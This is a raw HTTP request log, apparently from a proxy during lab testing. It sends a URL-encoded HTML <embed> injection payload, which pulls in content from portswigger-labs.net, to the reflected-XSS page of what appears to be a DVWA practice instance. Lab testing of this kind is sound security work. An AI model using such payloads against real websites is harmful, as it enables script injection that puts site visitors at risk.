GET /vulnerabilities/xss_r/?name=%3Cembed+code%3Dhttps%3A%2F%2Fportswigger-labs.net+width%3D500+height%3D500+type%3Dtext%2Fhtml%3E HTTP/1.1
Host: 10.10.3.128:2280
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

